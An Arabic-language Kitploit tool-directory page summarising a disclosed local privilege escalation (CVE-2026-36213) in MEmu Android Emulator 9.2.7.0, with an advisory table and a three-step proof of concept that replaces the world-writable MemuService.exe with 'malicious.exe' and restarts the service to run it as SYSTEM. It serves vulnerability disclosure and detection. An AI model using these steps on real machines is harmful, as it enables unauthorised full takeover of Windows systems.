Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-36213 — CVE-2026-36213 | تصعيد امتيازات محلي في محاكي أندرويد MEmu 9.2.7.0 عبر صلاحيات غير آمنة للملف الثنائي للخدمة | تم إصلاحه في 9.3.2 | Kitploit
أدوات/GitHubGitHub/sec-zone/cve-2026-36213
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | تصعيد امتيازات محلي في محاكي أندرويد MEmu 9.2.7.0 عبر صلاحيات غير آمنة للملف الثنائي للخدمة | تم إصلاحه في 9.3.2

عرض المستودع
51منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-36213

CVE-2026-36213 | تصعيد محلي للامتيازات في MEmu Android Emulator 9.2.7.0 عبر صلاحيات غير آمنة لملف الخدمة التنفيذي | تم إصلاحه في 9.3.2

CVE-2026-36213 — تصعيد محلي للامتيازات في MEmu Android Emulator 9.2.7.0

CVE CVSS Status Platform

الملخص

ثغرة تصعيد محلي للامتيازات (LPE) في MEmu Android Emulator 9.2.7.0.
تعمل الخدمة MEmuSVC بصلاحيات NT AUTHORITY\SYSTEM بينما يمكن لأي مستخدم محلي الكتابة على ملفها التنفيذي، مما يسمح بالسيطرة الكاملة على النظام.

الحقلالتفاصيل
CVECVE-2026-36213
المنتجMEmu Android Emulator (MicroVirt)
الإصدار المتأثر9.2.7.0 والإصدارات الأقدم
الإصدار المُصلَح9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

الثغرة

MEmuService.exe مثبّتة كخدمة Windows بمستوى SYSTEM مع صلاحيات NTFS غير آمنة:

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← Any local user has Full Control
Everyone:(F)        ← World-writable binar

إثبات المفهوم

:: الخطوة 1 - التحقق من الصلاحيات المعرضة للخطر

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: الخطوة 2 - استبدال الملف التنفيذي (كمستخدم محدود الصلاحيات)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: الخطوة 3 - إعادة تشغيل الخدمة

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: النتيجة: يعمل malicious.exe بصلاحيات NT AUTHORITY\SYSTEM

سكريبت الكشف

متاح على: https://github.com/sec-zone/Hijack-service-binaries

إخلاء المسؤولية

تم إجراء هذا البحث لأغراض تعليمية وفق سياسة الإفصاح المسؤول.
المؤلف غير مسؤول عن أي إساءة استخدام لهذه المعلومات.

الباحث

الاسم: Mohammad Hossein Ashofte Yazdi
لينكد إن: https://www.linkedin.com/in/seczone64
تويتر: @sec_zone64
البريد الإلكتروني: [email protected]

تنزيل الأداة